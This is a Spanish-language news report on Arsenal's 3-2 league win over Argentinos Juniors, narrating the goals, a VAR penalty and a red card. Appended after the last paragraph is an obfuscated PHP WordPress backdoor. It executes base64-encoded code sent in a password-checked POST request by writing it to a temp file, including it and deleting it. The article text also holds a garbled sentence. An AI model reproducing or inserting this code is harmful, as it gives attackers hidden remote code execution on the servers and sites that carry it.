Arsenal dio la sorpresa: le ganó a Argentinos Juniors en un partidazo

Arsenal arrancó la segunda fecha de la Liga de la Copa con una sorpresiva victoria ante Argentinos Juniors 3-2, en el estadio Julio Humberto Grondona. El equipo de Sarandí sigue último en las tabla anual y de promedio pero mantienen la ilusión de escaparle al descenso.

Apenas se habían jugado 7 segundos cuando Argentinos Juniors -que venía de derrotar al campeón River Plate en la jornada inaugural de esta Zona A- se puso en ventaja, con una pelota que capturó Gabriel Ávalos para poner el 1 a 0 con un remate bajo ante la salida de Alejandro Medina.

Poco tardó un concentrado Arsenal en igualar. Lucas Brochero recibió el centro de Braian Rivero y puso el 1 a 1, a los 7 minutos. Argentinos fue por más y Luciano Gondou con un zurdazo tras un rebote volvió a ponerlo arriba en el resultado, a los 21 minutos.

Se mantuvo la intensidad y el cambio de control, con un predominio de Arsenal revitalizado con los cambios. Y el ingresado Juan Cejas estrelló un tiro en el travesaño y Alexis Martín Arias protagonizó dos lucidas atajadas ante tiro del mismo Cejas y del paraguayo Alfredo Amarilla, otro de los que entró.

Llegó la polémica con un penal, otorgado luego que Nicolás Lamolina recibiese la llamada del VAR y chequease en la pantalla, que Santiago Toloza convirtió, a los 25 minutos. cambió por gol. Empezaba otro partido.

Creció más Arsenal y fue por la victoria. La consiguió, a los 32 minutos, con un centro de Adrián Sporle coronado con un cabezazo de Néstor Breitenbruch.

A los 38 minutos se dio un hecho sumamente curioso, con la expulsión de Adrián Lescano, que dejó a Argentinos con un jugador menos. El volante fue amonestado apenas ingresó, por no haber recibido la autorización, e insólitamente apenas dos minutos después recibió la segunda amarilla, por una infracción a Joaquín Pombo, a los 38 minutos.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}